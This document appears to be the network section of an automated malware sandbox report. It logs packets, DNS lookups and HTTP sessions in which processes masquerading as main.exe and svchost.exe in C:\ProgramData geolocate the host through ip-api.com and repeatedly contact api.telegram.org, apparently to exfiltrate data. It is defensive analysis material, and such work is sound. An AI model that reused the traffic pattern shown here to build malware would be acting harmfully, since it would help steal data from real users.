Jun 5, 2024 03:58:13.356564045 CEST	49842	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:58:13.356604099 CEST	443	49842	149.154.167.220	192.168.2.4
Jun 5, 2024 03:58:13.514976025 CEST	443	49841	149.154.167.220	192.168.2.4
Jun 5, 2024 03:58:13.515093088 CEST	49841	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:58:13.517139912 CEST	49841	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:58:13.517196894 CEST	443	49841	149.154.167.220	192.168.2.4
Jun 5, 2024 03:58:13.517719030 CEST	443	49841	149.154.167.220	192.168.2.4
Jun 5, 2024 03:58:13.518714905 CEST	49841	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:58:13.564502954 CEST	443	49841	149.154.167.220	192.168.2.4
Jun 5, 2024 03:58:13.757471085 CEST	443	49841	149.154.167.220	192.168.2.4
Jun 5, 2024 03:58:13.757555008 CEST	443	49841	149.154.167.220	192.168.2.4
Jun 5, 2024 03:58:13.757669926 CEST	49841	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:58:13.758385897 CEST	49841	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:58:14.197240114 CEST	443	49842	149.154.167.220	192.168.2.4
Jun 5, 2024 03:58:14.197626114 CEST	49842	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:58:14.271855116 CEST	49842	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:58:14.271936893 CEST	443	49842	149.154.167.220	192.168.2.4
Jun 5, 2024 03:58:14.272444963 CEST	443	49842	149.154.167.220	192.168.2.4
Jun 5, 2024 03:58:14.273425102 CEST	49842	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:58:14.320534945 CEST	443	49842	149.154.167.220	192.168.2.4
Jun 5, 2024 03:58:14.522886992 CEST	443	49842	149.154.167.220	192.168.2.4
Jun 5, 2024 03:58:14.522953987 CEST	443	49842	149.154.167.220	192.168.2.4
Jun 5, 2024 03:58:14.523149967 CEST	49842	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:58:14.523468018 CEST	49842	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:58:14.758965015 CEST	49843	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:58:14.759000063 CEST	443	49843	149.154.167.220	192.168.2.4
Jun 5, 2024 03:58:14.759076118 CEST	49843	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:58:14.759232044 CEST	49843	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:58:14.759243965 CEST	443	49843	149.154.167.220	192.168.2.4
Jun 5, 2024 03:58:15.524755001 CEST	49844	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:58:15.524838924 CEST	443	49844	149.154.167.220	192.168.2.4
Jun 5, 2024 03:58:15.524938107 CEST	49844	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:58:15.525273085 CEST	49844	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:58:15.525355101 CEST	443	49844	149.154.167.220	192.168.2.4
Jun 5, 2024 03:58:15.603852987 CEST	443	49843	149.154.167.220	192.168.2.4
Jun 5, 2024 03:58:15.604819059 CEST	49843	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:58:15.604835033 CEST	443	49843	149.154.167.220	192.168.2.4
Jun 5, 2024 03:58:15.854418039 CEST	443	49843	149.154.167.220	192.168.2.4
Jun 5, 2024 03:58:15.854500055 CEST	443	49843	149.154.167.220	192.168.2.4
Jun 5, 2024 03:58:15.854548931 CEST	49843	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:58:15.854818106 CEST	49843	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:58:16.365706921 CEST	443	49844	149.154.167.220	192.168.2.4
Jun 5, 2024 03:58:16.368719101 CEST	49844	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:58:16.368808031 CEST	443	49844	149.154.167.220	192.168.2.4
Jun 5, 2024 03:58:16.614265919 CEST	443	49844	149.154.167.220	192.168.2.4
Jun 5, 2024 03:58:16.614315987 CEST	443	49844	149.154.167.220	192.168.2.4
Jun 5, 2024 03:58:16.614573956 CEST	49844	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:58:16.632769108 CEST	49844	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:58:16.913312912 CEST	49845	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:58:16.913348913 CEST	443	49845	149.154.167.220	192.168.2.4
Jun 5, 2024 03:58:16.913399935 CEST	49845	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:58:16.913599968 CEST	49845	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:58:16.913609982 CEST	443	49845	149.154.167.220	192.168.2.4
Jun 5, 2024 03:58:17.649544001 CEST	49846	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:58:17.649579048 CEST	443	49846	149.154.167.220	192.168.2.4
Jun 5, 2024 03:58:17.649656057 CEST	49846	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:58:17.649913073 CEST	49846	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:58:17.649924994 CEST	443	49846	149.154.167.220	192.168.2.4
Jun 5, 2024 03:58:17.779386997 CEST	443	49845	149.154.167.220	192.168.2.4
Jun 5, 2024 03:58:17.780657053 CEST	49845	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:58:17.780677080 CEST	443	49845	149.154.167.220	192.168.2.4
Jun 5, 2024 03:58:18.028290033 CEST	443	49845	149.154.167.220	192.168.2.4
Jun 5, 2024 03:58:18.028433084 CEST	443	49845	149.154.167.220	192.168.2.4
Jun 5, 2024 03:58:18.028476000 CEST	49845	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:58:18.028707981 CEST	49845	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:58:18.492916107 CEST	443	49846	149.154.167.220	192.168.2.4
Jun 5, 2024 03:58:18.494122028 CEST	49846	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:58:18.494147062 CEST	443	49846	149.154.167.220	192.168.2.4
Jun 5, 2024 03:58:18.743860960 CEST	443	49846	149.154.167.220	192.168.2.4
Jun 5, 2024 03:58:18.743911982 CEST	443	49846	149.154.167.220	192.168.2.4
Jun 5, 2024 03:58:18.743956089 CEST	49846	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:58:18.744431019 CEST	49846	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:58:19.040716887 CEST	49847	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:58:19.040806055 CEST	443	49847	149.154.167.220	192.168.2.4
Jun 5, 2024 03:58:19.040929079 CEST	49847	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:58:19.041456938 CEST	49847	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:58:19.041538000 CEST	443	49847	149.154.167.220	192.168.2.4
Jun 5, 2024 03:58:19.758949041 CEST	49848	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:58:19.759032965 CEST	443	49848	149.154.167.220	192.168.2.4
Jun 5, 2024 03:58:19.759128094 CEST	49848	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:58:19.759550095 CEST	49848	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:58:19.759639025 CEST	443	49848	149.154.167.220	192.168.2.4
Jun 5, 2024 03:58:19.893076897 CEST	443	49847	149.154.167.220	192.168.2.4
Jun 5, 2024 03:58:19.893455029 CEST	49847	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:58:19.894423962 CEST	49847	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:58:19.894479036 CEST	443	49847	149.154.167.220	192.168.2.4
Jun 5, 2024 03:58:19.894999027 CEST	443	49847	149.154.167.220	192.168.2.4
Jun 5, 2024 03:58:19.895982027 CEST	49847	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:58:19.940574884 CEST	443	49847	149.154.167.220	192.168.2.4
Jun 5, 2024 03:58:20.141197920 CEST	443	49847	149.154.167.220	192.168.2.4
Jun 5, 2024 03:58:20.141357899 CEST	443	49847	149.154.167.220	192.168.2.4
Jun 5, 2024 03:58:20.141546965 CEST	49847	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:58:20.141916037 CEST	49847	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:58:20.603506088 CEST	443	49848	149.154.167.220	192.168.2.4
Jun 5, 2024 03:58:20.603722095 CEST	49848	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:58:20.605031967 CEST	49848	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:58:20.605089903 CEST	443	49848	149.154.167.220	192.168.2.4
Jun 5, 2024 03:58:20.605325937 CEST	443	49848	149.154.167.220	192.168.2.4
Jun 5, 2024 03:58:20.606220961 CEST	49848	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:58:20.648523092 CEST	443	49848	149.154.167.220	192.168.2.4
Jun 5, 2024 03:58:20.852926970 CEST	443	49848	149.154.167.220	192.168.2.4
Jun 5, 2024 03:58:20.852998972 CEST	443	49848	149.154.167.220	192.168.2.4
Jun 5, 2024 03:58:20.853085995 CEST	49848	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:58:20.853504896 CEST	49848	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:58:21.149574995 CEST	49849	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:58:21.149604082 CEST	443	49849	149.154.167.220	192.168.2.4
Jun 5, 2024 03:58:21.149669886 CEST	49849	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:58:21.149945021 CEST	49849	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:58:21.149951935 CEST	443	49849	149.154.167.220	192.168.2.4
Jun 5, 2024 03:58:21.868221045 CEST	49850	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:58:21.868252039 CEST	443	49850	149.154.167.220	192.168.2.4
Jun 5, 2024 03:58:21.870079041 CEST	49850	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:58:21.991667032 CEST	443	49849	149.154.167.220	192.168.2.4
Jun 5, 2024 03:58:22.086693048 CEST	49849	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:58:22.338624954 CEST	49850	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:58:22.338644028 CEST	443	49850	149.154.167.220	192.168.2.4
Jun 5, 2024 03:58:22.339941978 CEST	49849	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:58:22.339951992 CEST	443	49849	149.154.167.220	192.168.2.4
Jun 5, 2024 03:58:22.582519054 CEST	443	49849	149.154.167.220	192.168.2.4
Jun 5, 2024 03:58:22.582695961 CEST	443	49849	149.154.167.220	192.168.2.4
Jun 5, 2024 03:58:22.582772017 CEST	49849	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:58:22.583359003 CEST	49849	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:58:22.619575024 CEST	49750	80	192.168.2.4	208.95.112.1
Jun 5, 2024 03:58:22.961821079 CEST	49750	80	192.168.2.4	208.95.112.1
Jun 5, 2024 03:58:23.189774990 CEST	443	49850	149.154.167.220	192.168.2.4
Jun 5, 2024 03:58:23.189846992 CEST	49850	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:58:23.193898916 CEST	49850	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:58:23.193905115 CEST	443	49850	149.154.167.220	192.168.2.4
Jun 5, 2024 03:58:23.194109917 CEST	443	49850	149.154.167.220	192.168.2.4
Jun 5, 2024 03:58:23.197160959 CEST	49850	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:58:23.244513988 CEST	443	49850	149.154.167.220	192.168.2.4
Jun 5, 2024 03:58:23.447432041 CEST	443	49850	149.154.167.220	192.168.2.4
Jun 5, 2024 03:58:23.447489977 CEST	443	49850	149.154.167.220	192.168.2.4
Jun 5, 2024 03:58:23.447695017 CEST	49850	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:58:23.448009014 CEST	49850	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:58:23.573811054 CEST	49750	80	192.168.2.4	208.95.112.1
Jun 5, 2024 03:58:23.587028027 CEST	49851	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:58:23.587112904 CEST	443	49851	149.154.167.220	192.168.2.4
Jun 5, 2024 03:58:23.587207079 CEST	49851	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:58:23.587584019 CEST	49851	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:58:23.587671041 CEST	443	49851	149.154.167.220	192.168.2.4
Jun 5, 2024 03:58:24.425429106 CEST	443	49851	149.154.167.220	192.168.2.4
Jun 5, 2024 03:58:24.425535917 CEST	49851	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:58:24.426564932 CEST	49851	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:58:24.426597118 CEST	443	49851	149.154.167.220	192.168.2.4
Jun 5, 2024 03:58:24.426944971 CEST	443	49851	149.154.167.220	192.168.2.4
Jun 5, 2024 03:58:24.427748919 CEST	49851	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:58:24.471345901 CEST	49852	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:58:24.471375942 CEST	443	49852	149.154.167.220	192.168.2.4
Jun 5, 2024 03:58:24.471533060 CEST	49852	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:58:24.471621990 CEST	49852	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:58:24.471628904 CEST	443	49852	149.154.167.220	192.168.2.4
Jun 5, 2024 03:58:24.472569942 CEST	443	49851	149.154.167.220	192.168.2.4
Jun 5, 2024 03:58:24.774228096 CEST	49750	80	192.168.2.4	208.95.112.1
Jun 5, 2024 03:58:24.871058941 CEST	443	49851	149.154.167.220	192.168.2.4
Jun 5, 2024 03:58:24.871217966 CEST	443	49851	149.154.167.220	192.168.2.4
Jun 5, 2024 03:58:24.871298075 CEST	49851	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:58:25.315707922 CEST	443	49852	149.154.167.220	192.168.2.4
Jun 5, 2024 03:58:25.367966890 CEST	49852	443	192.168.2.4	149.154.167.220

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 5, 2024 03:56:27.290996075 CEST	61397	53	192.168.2.4	1.1.1.1
Jun 5, 2024 03:56:27.297962904 CEST	53	61397	1.1.1.1	192.168.2.4
Jun 5, 2024 03:56:28.961186886 CEST	49808	53	192.168.2.4	1.1.1.1
Jun 5, 2024 03:56:28.970896006 CEST	53	49808	1.1.1.1	192.168.2.4
Jun 5, 2024 03:56:40.117446899 CEST	61747	53	192.168.2.4	1.1.1.1
Jun 5, 2024 03:56:40.124118090 CEST	53	61747	1.1.1.1	192.168.2.4
Jun 5, 2024 03:56:43.540545940 CEST	58087	53	192.168.2.4	1.1.1.1
Jun 5, 2024 03:56:43.547657967 CEST	53	58087	1.1.1.1	192.168.2.4
Jun 5, 2024 03:57:14.593348980 CEST	62864	53	192.168.2.4	1.1.1.1
Jun 5, 2024 03:57:14.600795984 CEST	53	62864	1.1.1.1	192.168.2.4

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Type
Jun 5, 2024 03:56:48.100300074 CEST	192.168.2.4	149.154.167.220	4d59	Echo
Jun 5, 2024 03:56:48.114694118 CEST	149.154.167.220	192.168.2.4	5559	Echo Reply
Jun 5, 2024 03:57:03.589567900 CEST	192.168.2.4	149.154.167.220	4d57	Echo
Jun 5, 2024 03:57:03.602453947 CEST	149.154.167.220	192.168.2.4	5557	Echo Reply

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jun 5, 2024 03:56:27.290996075 CEST	192.168.2.4	1.1.1.1	0x3221	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false
Jun 5, 2024 03:56:28.961186886 CEST	192.168.2.4	1.1.1.1	0x9e66	Standard query (0)	raw.githubusercontent.com	A (IP address)	IN (0x0001)	false
Jun 5, 2024 03:56:40.117446899 CEST	192.168.2.4	1.1.1.1	0xa3ae	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Jun 5, 2024 03:56:43.540545940 CEST	192.168.2.4	1.1.1.1	0x5415	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Jun 5, 2024 03:57:14.593348980 CEST	192.168.2.4	1.1.1.1	0xec73	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jun 5, 2024 03:55:57.967330933 CEST	1.1.1.1	192.168.2.4	0x5e4f	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Jun 5, 2024 03:55:57.967330933 CEST	1.1.1.1	192.168.2.4	0x5e4f	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false
Jun 5, 2024 03:56:27.297962904 CEST	1.1.1.1	192.168.2.4	0x3221	No error (0)	ip-api.com		208.95.112.1	A (IP address)	IN (0x0001)	false
Jun 5, 2024 03:56:28.970896006 CEST	1.1.1.1	192.168.2.4	0x9e66	No error (0)	raw.githubusercontent.com		185.199.109.133	A (IP address)	IN (0x0001)	false
Jun 5, 2024 03:56:28.970896006 CEST	1.1.1.1	192.168.2.4	0x9e66	No error (0)	raw.githubusercontent.com		185.199.111.133	A (IP address)	IN (0x0001)	false
Jun 5, 2024 03:56:28.970896006 CEST	1.1.1.1	192.168.2.4	0x9e66	No error (0)	raw.githubusercontent.com		185.199.108.133	A (IP address)	IN (0x0001)	false
Jun 5, 2024 03:56:28.970896006 CEST	1.1.1.1	192.168.2.4	0x9e66	No error (0)	raw.githubusercontent.com		185.199.110.133	A (IP address)	IN (0x0001)	false
Jun 5, 2024 03:56:40.124118090 CEST	1.1.1.1	192.168.2.4	0xa3ae	No error (0)	www.google.com		216.58.212.132	A (IP address)	IN (0x0001)	false
Jun 5, 2024 03:56:43.547657967 CEST	1.1.1.1	192.168.2.4	0x5415	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false
Jun 5, 2024 03:57:14.600795984 CEST	1.1.1.1	192.168.2.4	0xec73	No error (0)	ip-api.com		208.95.112.1	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

raw.githubusercontent.com

api.telegram.org

ip-api.com

www.google.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49745	208.95.112.1	80	5064	C:\ProgramData\main.exe

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 03:56:27.334147930 CEST	65	OUT	GET /json/ HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Jun 5, 2024 03:56:27.933069944 CEST	468	IN	HTTP/1.1 200 OK Date: Wed, 05 Jun 2024 01:56:26 GMT Content-Type: application/json; charset=utf-8 Content-Length: 291 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 54 58 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 54 65 78 61 73 22 2c 22 63 69 74 79 22 3a 22 4b 69 6c 6c 65 65 6e 22 2c 22 7a 69 70 22 3a 22 37 36 35 34 39 22 2c 22 6c 61 74 22 3a 33 31 2e 30 30 36 35 2c 22 6c 6f 6e 22 3a 2d 39 37 2e 38 34 30 36 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 22 2c 22 69 73 70 22 3a 22 51 75 61 64 72 61 4e 65 74 22 2c 22 6f 72 67 22 3a 22 4f 4d 47 49 54 53 46 41 53 54 22 2c 22 61 73 22 3a 22 41 53 38 31 30 30 20 51 75 61 64 72 61 4e 65 74 20 45 6e 74 65 72 70 72 69 73 65 73 20 4c 4c 43 22 2c 22 71 75 65 72 79 22 3a 22 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 31 22 7d Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"TX","regionName":"Texas","city":"Killeen","zip":"76549","lat":31.0065,"lon":-97.8406,"timezone":"America/Chicago","isp":"QuadraNet","org":"OMGITSFAST","as":"AS8100 QuadraNet Enterprises LLC","query":"173.254.250.91"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49748	216.58.212.132	80	5952	C:\ProgramData\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 03:56:40.134970903 CEST	149	OUT	GET / HTTP/1.1 Host: www.google.com User-Agent: python-requests/2.28.1 Accept-Encoding: gzip, deflate, br Accept: / Connection: keep-alive
Jun 5, 2024 03:56:41.030531883 CEST	1236	IN	HTTP/1.1 200 OK Date: Wed, 05 Jun 2024 01:56:40 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=ISO-8859-1 Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-aiQhgy_sbOHoc9zCQcchNA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Encoding: gzip Server: gws Content-Length: 8471 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: 1P_JAR=2024-06-05-01; expires=Fri, 05-Jul-2024 01:56:40 GMT; path=/; domain=.google.com; Secure Set-Cookie: AEC=AQTF6Hzc44E2muI_JCMTesoFs_XrQMBQ4j4mMnT3QfBhwhghiDa3ob9UOeY; expires=Mon, 02-Dec-2024 01:56:40 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax Set-Cookie: NID=514=CbNGde4uPsMuHjhUahG7Gu93zHQxj5m4ogfTpQcwvgyV-QaM_8Jn4VY2LeLIWTl6oLCfc6EGVpX4T7p5p6K0OJL01GFc4o4ljhFfRKmg4I-BHiFnFTqVEEcJ0tDKCp3Xzs8YC4HjEGgip-MGRb_DAAOaRvTkeR9yBl7q4oppoG8; expires=Thu, 05-Dec-2024 01:56:40 GMT; path=/; domain=.google.com; HttpOnly Data Raw: 1f 8b 08 00 00 00 00 00 02 ff cd 7c 69 77 db b8 d2 e6 f7 fc 0a 9a 99 ab 88 c7 b4 44 52 bb 64 da e3 38 ce d2 37 e9 a4 e3 f4 72 db ed f1 0b 92 90 c4 98 8b 4c 52 b6 15 5b ff 7d 9e 02 b8 49 56 ba fb ed 99 33 67 9c 58 22 80 02 50 1b 0a 55 05 d0 87 7b 5e ec 66 ab 05 57 e6 59 18 1c 1d d2 a7 e2 67 3c 4c dd 78 c1 6d 55 15 05 02 b0 d5 Data Ascii: \|iwDRd87rLR[}IV3gX"PU{^fWYg<LxmU
Jun 5, 2024 03:56:41.030555010 CEST	1236	IN	Data Raw: 79 96 2d c6 ed 76 ea ce 79 c8 5a 71 32 6b ff ca 9d 4f 6c c6 55 25 60 d1 cc 56 79 a4 62 04 ce bc a3 c3 90 67 4c 71 e3 28 e3 51 66 ab e7 9c 25 ee 5c c9 e6 5c b9 8b 93 c0 7b 91 2a 7e 34 8d 93 90 65 7e 1c e9 28 b8 c1 d2 f3 a3 99 72 c7 9d 05 46 4c 51 Data Ascii: y-vyZq2kOlU%`VybgLq(Qf%\\{*~4e~(rFLQ[qS8-MR%dJIYL9O,V<X(xL}r7gH5M,Zz<uA8$Dq-tMb''PYS~l}2D[v3AmWi
Jun 5, 2024 03:56:41.030571938 CEST	424	IN	Data Raw: 2f df 8f 5f ac 7e e9 dd e3 f1 23 4c fd 70 34 1a 0c bb dd d1 7a b2 bd 59 b0 49 33 5a 06 81 6d 37 99 7d 87 5d 38 be 6b c9 ed 4b 3b 36 c6 ac 95 66 b7 a9 ab 1d cb aa 16 76 15 fb 6a 46 5f e3 0d 58 54 4e d6 5a cb 65 41 d0 cc e6 7e aa a1 d4 d4 36 e6 ca Data Ascii: /_~#Lp4zYI3Zm7}]8kK;6fvjF_XTNZeA~6GH#{^<4chT4'~D{&]jLYOPEiKLXcN,eYTM4KN{\|<>rIlT<_w
Jun 5, 2024 03:56:41.030631065 CEST	1236	IN	Data Raw: 1a 8d b2 87 a8 52 f5 a2 11 70 ae ed 42 ed 49 ae 7b b6 5b 83 8c 17 be aa bb 9b 63 92 1e b8 b6 31 71 0f a7 ad 80 47 b3 6c 3e 71 f7 f7 b5 07 7f da 34 80 bb fb f8 68 1c ba 9a 47 14 aa 13 7c 4d 2f dc cb 0b e3 72 5f 05 b1 e2 d9 bc 5c 4b 8e ab 6d 75 bf Data Ascii: RpBI{[c1qGl>q4hG\|M/r_\Kmuyxte]UWonY.>Aw0Z=7R.WVTk+`' \jhpM{`vwVfEKME y8xz<Wcsl
Jun 5, 2024 03:56:41.030833960 CEST	1236	IN	Data Raw: a0 8e e2 32 09 9a 45 ee 35 62 b7 57 70 c3 62 cb 1a 51 5a 55 83 d4 0f ac 3e d9 b0 84 2f 38 cb 0e ee 6b 22 2c 88 22 49 4d dc 65 92 a2 7e 11 fb 51 c6 93 3a c6 93 6a 11 2e 33 c2 0a 4f 52 3d 7b 3b d4 73 97 b9 22 8c 0b 05 a8 f3 56 72 47 2c 9a f1 14 db Data Ascii: 2E5bWpbQZU>/8k","IMe~Q:j.3OR={;s"VrG,SP 2f~&cSwn=>%_OTq@r_;FH_S/]Y-3ow>ib&%'"5BRKW(uT"(/z;e.i
Jun 5, 2024 03:56:41.030848026 CEST	424	IN	Data Raw: b9 f5 5d fe 3e 86 cb 9e 6b f7 02 93 40 b2 36 39 bc e4 c1 61 a2 25 b7 77 53 d8 e0 ae fd e6 e4 f7 93 93 9f 36 b0 83 27 8f cd 69 b7 74 0a b0 79 ae 29 22 b8 32 fe 0c 42 26 37 4a 10 f9 e9 72 0a 3c 60 63 e0 ba 05 b0 2d 30 d7 41 a0 0a 83 14 cc 16 5e 65 Data Ascii: ]>k@69a%wS6'ity)"2B&7Jr<`c-0A^ePd((,.o@Eb#K{RWwRtu7GyU&k`J%(ZSE\|AD4RAab_z\CVFA>(C;DVe/9k)DS*-lxH>
Jun 5, 2024 03:56:41.030863047 CEST	726	IN	Data Raw: 1a c9 ba fd fc 6f 4f 4a cb 23 4b 97 be 77 65 56 0a f7 22 54 5e 73 1e 50 48 f8 7e e9 5e af 6a 58 bc 7b 82 c5 3f 73 ea 30 ef 8b 7c de 17 35 27 89 17 c1 ce cb d5 3b af e9 7b 1a 5c 38 91 65 df f4 e1 c8 03 a3 1c 41 8b 96 70 91 fa d7 1e 44 95 3b e7 ee Data Ascii: oOJ#KweV"T^sPH~^jX{?s0\|5';{\8eApD;5'l gvESZONMexc/{1ynNK4zFW~=<y-.8+1y6%\X\~@ZX5{a[i+iMu*\|C)iW\|vFSXlR
Jun 5, 2024 03:56:41.030884027 CEST	1236	IN	Data Raw: ec 63 a8 11 73 53 56 37 2f cb 79 29 a9 d0 a4 a3 5a 4a 3d ed d9 15 85 2d 41 d5 e3 a3 b3 51 29 a9 d6 8a fb 47 b2 45 9f da 22 f1 85 a5 ac b6 e5 e0 22 dd da c8 f3 ad 70 e4 6c 75 9f ed ab 78 9a 53 aa 6d 3f bf 9a 54 65 60 75 d4 ab fa b5 7d 71 a9 07 f6 Data Ascii: csSV7/y)ZJ=-AQ)GE""pluxSm?Te`u}qkW<W$nFuv(E6wu}wyJ)1+?6~pX=t/(/Z<jG7I]c~,>sZ[\|NvO//sW
Jun 5, 2024 03:56:41.030900002 CEST	212	IN	Data Raw: 6f bb ee b2 b2 6c 0a 73 d9 30 1b 8d ac f9 8d 2e 53 7c 13 1b c2 4e 58 81 9f b6 c1 59 7b 39 e1 ad ab d7 57 5f 53 ba 02 bf 14 32 3c a1 db c0 25 13 4f 21 98 93 c7 c7 26 96 96 8e 16 43 5b 3f db 9d c7 28 a2 9e dd fa f2 b7 f4 ab ae 52 8b 52 a7 84 1d dc Data Ascii: ols0.S\|NXY{9W_S2<%O!&C[?(RRk21g)JJ;>[2T:\6;q(s)mt!)m{Fy)9\|lmQ0?]o~OSP:E>jTx
Jun 5, 2024 03:56:41.030905962 CEST	1236	IN	Data Raw: 82 a4 5c 95 74 a1 f3 1e 57 8a ad 94 8f 8f 8f ca 43 79 95 e4 ea d5 32 5c 9c dd bb 5c bc ed 0d b0 ab a7 55 a5 32 89 0c 35 5d ca e2 93 6a 80 b4 36 76 9a 0f 7e 95 fe f5 c0 e5 00 37 f5 11 6e ca 21 6e fe ce 18 db 3e 70 66 5f 98 fa 50 37 c4 3f ab 6f 51 Data Ascii: \tWCy2\\U25]j6v~7n!n>pf_P7?oQ2=7{FW&Z`7d;)CoWv;1CkY71[FU :AX2L\"< 8MHk@\|W[iBBoSY~1i?-Zo
